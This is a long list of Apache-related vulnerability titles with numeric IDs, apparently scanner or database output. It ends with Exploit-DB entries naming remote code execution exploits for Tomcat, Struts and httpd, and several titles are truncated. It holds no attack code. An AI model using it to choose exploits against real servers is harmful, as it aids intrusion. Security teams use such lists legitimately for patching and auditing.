14915| [61006] Apache SLMS Quoting cross-site request forgery
14916| [60962] Apache Tomcat time cross-site scripting
14917| [60883] Apache mod_proxy_http information disclosure
14918| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
14919| [60264] Apache Tomcat Transfer-Encoding denial of service
14920| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
14921| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
14922| [59413] Apache mod_proxy_http timeout information disclosure
14923| [59058] Apache MyFaces unencrypted view state cross-site scripting
14924| [58827] Apache Axis2 xsd file include
14925| [58790] Apache Axis2 modules cross-site scripting
14926| [58299] Apache ActiveMQ queueBrowse cross-site scripting
14927| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
14928| [58056] Apache ActiveMQ .jsp source code disclosure
14929| [58055] Apache Tomcat realm name information disclosure
14930| [58046] Apache HTTP Server mod_auth_shadow security bypass
14931| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
14932| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
14933| [57429] Apache CouchDB algorithms information disclosure
14934| [57398] Apache ActiveMQ Web console cross-site request forgery
14935| [57397] Apache ActiveMQ createDestination.action cross-site scripting
14936| [56653] Apache HTTP Server DNS spoofing
14937| [56652] Apache HTTP Server DNS cross-site scripting
14938| [56625] Apache HTTP Server request header information disclosure
14939| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
14940| [56623] Apache HTTP Server mod_proxy_ajp denial of service
14941| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
14942| [55857] Apache Tomcat WAR files directory traversal
14943| [55856] Apache Tomcat autoDeploy attribute security bypass
14944| [55855] Apache Tomcat WAR directory traversal
14945| [55210] Intuit component for Joomla! Apache information disclosure
14946| [54533] Apache Tomcat 404 error page cross-site scripting
14947| [54182] Apache Tomcat admin default password
14948| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
14949| [53666] Apache HTTP Server Solaris pollset support denial of service
14950| [53650] Apache HTTP Server HTTP basic-auth module security bypass
14951| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
14952| [53041] mod_proxy_ftp module for Apache denial of service
14953| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
14954| [51953] Apache Tomcat Path Disclosure
14955| [51952] Apache Tomcat Path Traversal
14956| [51951] Apache stronghold-status Information Disclosure
14957| [51950] Apache stronghold-info Information Disclosure
14958| [51949] Apache PHP Source Code Disclosure
14959| [51948] Apache Multiviews Attack
14960| [51946] Apache JServ Environment Status Information Disclosure
14961| [51945] Apache error_log Information Disclosure
14962| [51944] Apache Default Installation Page Pattern Found
14963| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
14964| [51942] Apache AXIS XML External Entity File Retrieval
14965| [51941] Apache AXIS Sample Servlet Information Leak
14966| [51940] Apache access_log Information Disclosure
14967| [51626] Apache mod_deflate denial of service
14968| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
14969| [51365] Apache Tomcat RequestDispatcher security bypass
14970| [51273] Apache HTTP Server Incomplete Request denial of service
14971| [51195] Apache Tomcat XML information disclosure
14972| [50994] Apache APR-util xml/apr_xml.c denial of service
14973| [50993] Apache APR-util apr_brigade_vprintf denial of service
14974| [50964] Apache APR-util apr_strmatch_precompile() denial of service
14975| [50930] Apache Tomcat j_security_check information disclosure
14976| [50928] Apache Tomcat AJP denial of service
14977| [50884] Apache HTTP Server XML ENTITY denial of service
14978| [50808] Apache HTTP Server AllowOverride privilege escalation
14979| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
14980| [50059] Apache mod_proxy_ajp information disclosure
14981| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
14982| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
14983| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
14984| [49921] Apache ActiveMQ Web interface cross-site scripting
14985| [49898] Apache Geronimo Services/Repository directory traversal
14986| [49725] Apache Tomcat mod_jk module information disclosure
14987| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
14988| [49712] Apache Struts unspecified cross-site scripting
14989| [49213] Apache Tomcat cal2.jsp cross-site scripting
14990| [48934] Apache Tomcat POST doRead method information disclosure
14991| [48211] Apache Tomcat header HTTP request smuggling
14992| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
14993| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
14994| [47709] Apache Roller "
14995| [47104] Novell Netware ApacheAdmin console security bypass
14996| [47086] Apache HTTP Server OS fingerprinting unspecified
14997| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
14998| [45791] Apache Tomcat RemoteFilterValve security bypass
14999| [44435] Oracle WebLogic Apache Connector buffer overflow
15000| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15001| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15002| [44156] Apache Tomcat RequestDispatcher directory traversal
15003| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15004| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15005| [42987] Apache HTTP Server mod_proxy module denial of service
15006| [42915] Apache Tomcat JSP files path disclosure
15007| [42914] Apache Tomcat MS-DOS path disclosure
15008| [42892] Apache Tomcat unspecified unauthorized access
15009| [42816] Apache Tomcat Host Manager cross-site scripting
15010| [42303] Apache 403 error cross-site scripting
15011| [41618] Apache-SSL ExpandCert() authentication bypass
15012| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15013| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15014| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15015| [40562] Apache Geronimo init information disclosure
15016| [40478] Novell Web Manager webadmin-apache.conf security bypass
15017| [40411] Apache Tomcat exception handling information disclosure
15018| [40409] Apache Tomcat native (APR based) connector weak security
15019| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15020| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15021| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15022| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15023| [39804] Apache Tomcat SingleSignOn information disclosure
15024| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15025| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15026| [39608] Apache HTTP Server balancer manager cross-site request forgery
15027| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15028| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15029| [39472] Apache HTTP Server mod_status cross-site scripting
15030| [39201] Apache Tomcat JULI logging weak security
15031| [39158] Apache HTTP Server Windows SMB shares information disclosure
15032| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15033| [38951] Apache::AuthCAS Perl module cookie SQL injection
15034| [38800] Apache HTTP Server 413 error page cross-site scripting
15035| [38211] Apache Geronimo SQLLoginModule authentication bypass
15036| [37243] Apache Tomcat WebDAV directory traversal
15037| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15038| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15039| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15040| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15041| [36782] Apache Geronimo MEJB unauthorized access
15042| [36586] Apache HTTP Server UTF-7 cross-site scripting
15043| [36468] Apache Geronimo LoginModule security bypass
15044| [36467] Apache Tomcat functions.jsp cross-site scripting
15045| [36402] Apache Tomcat calendar cross-site request forgery
15046| [36354] Apache HTTP Server mod_proxy module denial of service
15047| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15048| [36336] Apache Derby lock table privilege escalation
15049| [36335] Apache Derby schema privilege escalation
15050| [36006] Apache Tomcat "
15051| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15052| [35999] Apache Tomcat \"
15053| [35795] Apache Tomcat CookieExample cross-site scripting
15054| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15055| [35384] Apache HTTP Server mod_cache module denial of service
15056| [35097] Apache HTTP Server mod_status module cross-site scripting
15057| [35095] Apache HTTP Server Prefork MPM module denial of service
15058| [34984] Apache HTTP Server recall_headers information disclosure
15059| [34966] Apache HTTP Server MPM content spoofing
15060| [34965] Apache HTTP Server MPM information disclosure
15061| [34963] Apache HTTP Server MPM multiple denial of service
15062| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15063| [34869] Apache Tomcat JSP example Web application cross-site scripting
15064| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15065| [34496] Apache Tomcat JK Connector security bypass
15066| [34377] Apache Tomcat hello.jsp cross-site scripting
15067| [34212] Apache Tomcat SSL configuration security bypass
15068| [34210] Apache Tomcat Accept-Language cross-site scripting
15069| [34209] Apache Tomcat calendar application cross-site scripting
15070| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15071| [34167] Apache Axis WSDL file path disclosure
15072| [34068] Apache Tomcat AJP connector information disclosure
15073| [33584] Apache HTTP Server suEXEC privilege escalation
15074| [32988] Apache Tomcat proxy module directory traversal
15075| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15076| [32708] Debian Apache tty privilege escalation
15077| [32441] ApacheStats extract() PHP call unspecified
15078| [32128] Apache Tomcat default account
15079| [31680] Apache Tomcat RequestParamExample cross-site scripting
15080| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15081| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15082| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15083| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15084| [29550] Apache mod_tcl set_var() format string
15085| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15086| [28357] Apache HTTP Server mod_alias script source information disclosure
15087| [28063] Apache mod_rewrite off-by-one buffer overflow
15088| [27902] Apache Tomcat URL information disclosure
15089| [26786] Apache James SMTP server denial of service
15090| [25680] libapache2 /tmp/svn file upload
15091| [25614] Apache Struts lookupMap cross-site scripting
15092| [25613] Apache Struts ActionForm denial of service
15093| [25612] Apache Struts isCancelled() security bypass
15094| [24965] Apache mod_python FileSession command execution
15095| [24716] Apache James spooler memory leak denial of service
15096| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15097| [24158] Apache Geronimo jsp-examples cross-site scripting
15098| [24030] Apache auth_ldap module multiple format strings
15099| [24008] Apache mod_ssl custom error message denial of service
15100| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15101| [23612] Apache mod_imap referer field cross-site scripting
15102| [23173] Apache Struts error message cross-site scripting
15103| [22942] Apache Tomcat directory listing denial of service
15104| [22858] Apache Multi-Processing Module code allows denial of service
15105| [22602] RHSA-2005:582 updates for Apache httpd not installed
15106| [22520] Apache mod-auth-shadow "
15107| [22466] ApacheTop symlink
15108| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15109| [22006] Apache HTTP Server byte-range filter denial of service
15110| [21567] Apache mod_ssl off-by-one buffer overflow
15111| [21195] Apache HTTP Server header HTTP request smuggling
15112| [20383] Apache HTTP Server htdigest buffer overflow
15113| [19681] Apache Tomcat AJP12 request denial of service
15114| [18993] Apache HTTP server check_forensic symlink attack
15115| [18790] Apache Tomcat Manager cross-site scripting
15116| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15117| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15118| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15119| [17961] Apache Web server ServerTokens has not been set
15120| [17930] Apache HTTP Server HTTP GET request denial of service
15121| [17785] Apache mod_include module buffer overflow
15122| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15123| [17473] Apache HTTP Server Satisfy directive allows access to resources
15124| [17413] Apache htpasswd buffer overflow
15125| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15126| [17382] Apache HTTP Server IPv6 apr_util denial of service
15127| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15128| [17273] Apache HTTP Server speculative mode denial of service
15129| [17200] Apache HTTP Server mod_ssl denial of service
15130| [16890] Apache HTTP Server server-info request has been detected
15131| [16889] Apache HTTP Server server-status request has been detected
15132| [16705] Apache mod_ssl format string attack
15133| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15134| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15135| [16230] Apache HTTP Server PHP denial of service
15136| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15137| [15958] Apache HTTP Server authentication modules memory corruption
15138| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15139| [15540] Apache HTTP Server socket starvation denial of service
15140| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15141| [15422] Apache HTTP Server mod_access information disclosure
15142| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15143| [15293] Apache for Cygwin "
15144| [15065] Apache-SSL has a default password
15145| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15146| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15147| [14751] Apache Mod_python output filter information disclosure
15148| [14125] Apache HTTP Server mod_userdir module information disclosure
15149| [14075] Apache HTTP Server mod_php file descriptor leak
15150| [13703] Apache HTTP Server account
15151| [13689] Apache HTTP Server configuration allows symlinks
15152| [13688] Apache HTTP Server configuration allows SSI
15153| [13687] Apache HTTP Server Server: header value
15154| [13685] Apache HTTP Server ServerTokens value
15155| [13684] Apache HTTP Server ServerSignature value
15156| [13672] Apache HTTP Server config allows directory autoindexing
15157| [13671] Apache HTTP Server default content
15158| [13670] Apache HTTP Server config file directive references outside content root
15159| [13668] Apache HTTP Server httpd not running in chroot environment
15160| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15161| [13664] Apache HTTP Server config file contains ScriptAlias entry
15162| [13663] Apache HTTP Server CGI support modules loaded
15163| [13661] Apache HTTP Server config file contains AddHandler entry
15164| [13660] Apache HTTP Server 500 error page not CGI script
15165| [13659] Apache HTTP Server 413 error page not CGI script
15166| [13658] Apache HTTP Server 403 error page not CGI script
15167| [13657] Apache HTTP Server 401 error page not CGI script
15168| [13552] Apache HTTP Server mod_cgid module information disclosure
15169| [13550] Apache GET request directory traversal
15170| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15171| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15172| [13429] Apache Tomcat non-HTTP request denial of service
15173| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15174| [13295] Apache weak password encryption
15175| [13254] Apache Tomcat .jsp cross-site scripting
15176| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15177| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15178| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15179| [12662] Apache HTTP Server rotatelogs denial of service
15180| [12554] Apache Tomcat stores password in plain text
15181| [12553] Apache HTTP Server redirects and subrequests denial of service
15182| [12552] Apache HTTP Server FTP proxy server denial of service
15183| [12551] Apache HTTP Server prefork MPM denial of service
15184| [12550] Apache HTTP Server weaker than expected encryption
15185| [12549] Apache HTTP Server type-map file denial of service
15186| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15187| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15188| [12091] Apache HTTP Server apr_password_validate denial of service
15189| [12090] Apache HTTP Server apr_psprintf code execution
15190| [11804] Apache HTTP Server mod_access_referer denial of service
15191| [11750] Apache HTTP Server could leak sensitive file descriptors
15192| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15193| [11703] Apache long slash path allows directory listing
15194| [11695] Apache HTTP Server LF (Line Feed) denial of service
15195| [11694] Apache HTTP Server filestat.c denial of service
15196| [11438] Apache HTTP Server MIME message boundaries information disclosure
15197| [11412] Apache HTTP Server error log terminal escape sequence injection
15198| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15199| [11195] Apache Tomcat web.xml could be used to read files
15200| [11194] Apache Tomcat URL appended with a null character could list directories
15201| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15202| [11126] Apache HTTP Server illegal character file disclosure
15203| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15204| [11124] Apache HTTP Server DOS device name denial of service
15205| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15206| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15207| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15208| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15209| [10499] Apache HTTP Server WebDAV HTTP POST view source
15210| [10457] Apache HTTP Server mod_ssl "
15211| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15212| [10414] Apache HTTP Server htdigest multiple buffer overflows
15213| [10413] Apache HTTP Server htdigest temporary file race condition
15214| [10412] Apache HTTP Server htpasswd temporary file race condition
15215| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15216| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15217| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15218| [10280] Apache HTTP Server shared memory scorecard overwrite
15219| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15220| [10241] Apache HTTP Server Host: header cross-site scripting
15221| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15222| [10208] Apache HTTP Server mod_dav denial of service
15223| [10206] HP VVOS Apache mod_ssl denial of service
15224| [10200] Apache HTTP Server stderr denial of service
15225| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15226| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15227| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15228| [10098] Slapper worm targets OpenSSL/Apache systems
15229| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15230| [9875] Apache HTTP Server .var file request could disclose installation path
15231| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15232| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15233| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15234| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15235| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15236| [9396] Apache Tomcat null character to threads denial of service
15237| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15238| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15239| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15240| [8932] Apache Tomcat example class information disclosure
15241| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15242| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15243| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15244| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15245| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15246| [8400] Apache HTTP Server mod_frontpage buffer overflows
15247| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15248| [8308] Apache "
15249| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15250| [8119] Apache and PHP OPTIONS request reveals "
15251| [8054] Apache is running on the system
15252| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15253| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15254| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15255| [7836] Apache HTTP Server log directory denial of service
15256| [7815] Apache for Windows "
15257| [7810] Apache HTTP request could result in unexpected behavior
15258| [7599] Apache Tomcat reveals installation path
15259| [7494] Apache "
15260| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15261| [7363] Apache Web Server hidden HTTP requests
15262| [7249] Apache mod_proxy denial of service
15263| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15264| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15265| [7059] Apache "
15266| [7057] Apache "
15267| [7056] Apache "
15268| [7055] Apache "
15269| [7054] Apache "
15270| [6997] Apache Jakarta Tomcat error message may reveal information
15271| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15272| [6970] Apache crafted HTTP request could reveal the internal IP address
15273| [6921] Apache long slash path allows directory listing
15274| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15275| [6527] Apache Web Server for Windows and OS2 denial of service
15276| [6316] Apache Jakarta Tomcat may reveal JSP source code
15277| [6305] Apache Jakarta Tomcat directory traversal
15278| [5926] Linux Apache symbolic link
15279| [5659] Apache Web server discloses files when used with php script
15280| [5310] Apache mod_rewrite allows attacker to view arbitrary files
15281| [5204] Apache WebDAV directory listings
15282| [5197] Apache Web server reveals CGI script source code
15283| [5160] Apache Jakarta Tomcat default installation
15284| [5099] Trustix Secure Linux installs Apache with world writable access
15285| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
15286| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
15287| [4931] Apache source.asp example file allows users to write to files
15288| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
15289| [4205] Apache Jakarta Tomcat delivers file contents
15290| [2084] Apache on Debian by default serves the /usr/doc directory
15291| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
15292| [697] Apache HTTP server beck exploit
15293| [331] Apache cookies buffer overflow
15294|
15295| Exploit-DB - https://www.exploit-db.com:
15296| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
15297| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15298| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15299| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
15300| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
15301| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
15302| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
15303| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
15304| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
15305| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15306| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
15307| [29859] Apache Roller OGNL Injection
15308| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
15309| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
15310| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
15311| [29290] Apache / PHP 5.x Remote Code Execution Exploit
15312| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
15313| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
15314| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
15315| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
15316| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
15317| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
15318| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
15319| [27096] Apache Geronimo 1.0 Error Page XSS
15320| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
15321| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
15322| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
15323| [25986] Plesk Apache Zeroday Remote Exploit
15324| [25980] Apache Struts includeParams Remote Code Execution
15325| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
15326| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
15327| [24874] Apache Struts ParametersInterceptor Remote Code Execution
15328| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
15329| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
15330| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
15331| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
15332| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
15333| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
15334| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
15335| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
15336| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
15337| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
15338| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
15339| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
15340| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
15341| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
15342| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
15343| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
15344| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15345| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
15346| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
15347| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15348| [21719] Apache 2.0 Path Disclosure Vulnerability
15349| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15350| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
15351| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
15352| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
15353| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
15354| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
15355| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
15356| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
15357| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
15358| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
15359| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
15360| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
15361| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
15362| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
15363| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
15364| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
15365| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
15366| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
15367| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
15368| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
15369| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
15370| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
15371| [20558] Apache 1.2 Web Server DoS Vulnerability
15372| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
15373| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
15374| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
15375| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
15376| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
15377| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
15378| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
15379| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
15380| [19231] PHP apache_request_headers Function Buffer Overflow
15381| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
15382| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
15383| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
15384| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
15385| [18442] Apache httpOnly Cookie Disclosure
15386| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
15387| [18221] Apache HTTP Server Denial of Service
15388| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
15389| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
15390| [17691] Apache Struts < 2.2.0 - Remote Command Execution
15391| [16798] Apache mod_jk 1.2.20 Buffer Overflow
15392| [16782] Apache Win32 Chunked Encoding
15393| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
15394| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
15395| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
